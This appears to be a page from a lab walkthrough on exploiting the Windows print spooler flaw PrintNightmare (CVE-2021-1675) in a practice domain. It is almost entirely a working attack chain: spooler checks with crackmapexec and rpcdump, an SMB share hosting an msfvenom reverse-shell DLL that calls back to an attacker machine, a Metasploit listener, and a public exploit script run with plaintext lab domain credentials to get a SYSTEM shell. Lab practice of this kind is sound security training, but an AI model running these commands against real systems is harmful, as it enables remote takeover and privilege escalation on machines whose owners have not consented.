Check and Prepare

The Explanation

The print spooler service is started as the system account which is the highest account in windows that you can take over. You will trick the print spooler to install a new driver from an unc path and load that driver. In our case, a DLL file and once loaded will give the reverse shell to our kali machine. Because the print spooler service is started as System user it will be the system user calling back to the kali machine and not the non-privledged user we are using to install the driver.

To exploit printnightmare we will first check if the spooler is active on targets

Check spooler is active

crackmapexec smb 192.168.56.10-23 -M spooler

rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'

Setup SMB to Host our .dll

sudo smbserver.py -smb2support "smb" /home/jefe/smb

Create Revershell and place it in the smb directory

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll

Setup the listener

msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run

Download and execute exploit

wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/SharpPrintNightmare/CVE-2021-1675.py

python3 CVE-2021-1675.py north.newyork.local/claudio.ortiz:babyboy@bronx.north.newyork.local '\\192.168.56.31\smb\remote.dll'

Got Shell?

PreviousPrintNightmare - Bronx Nextwindows and linux

Last updated 2 years ago